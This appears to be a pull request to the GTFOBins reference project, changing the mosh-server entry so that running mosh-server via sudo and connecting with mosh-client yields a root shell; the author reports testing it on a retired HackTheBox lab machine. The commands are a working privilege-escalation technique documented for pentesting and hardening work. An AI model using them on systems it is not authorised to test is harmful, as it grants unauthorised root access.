### PR TITLE
Fix mosh-server drop shell payload

### DIFF
--- a/_gtfobins/mosh-server
+++ b/_gtfobins/mosh-server
@@ -2,11 +2,13 @@
 functions:
   shell:
   - code: |-
-      mosh --server=mosh-server localhost /bin/sh
+      sudo mosh-server
+      export MOSH_KEY=key
+      mosh-client 127.0.0.1 60001
     comment: |-
       This requires a valid SSH access.
     contexts:
       sudo:
         comment: |-
-          The `mosh-server` is executed via `sudo`.
+          Mosh key is obtained from mosh-server output.
 ...


### PR DESCRIPTION
The original payload spawns a shell of current user instead of root.
Connect to mosh-server via mosh-client binary fixes the issue.
I've tested on HackTheBox retired machine UnderPass. Works as expected.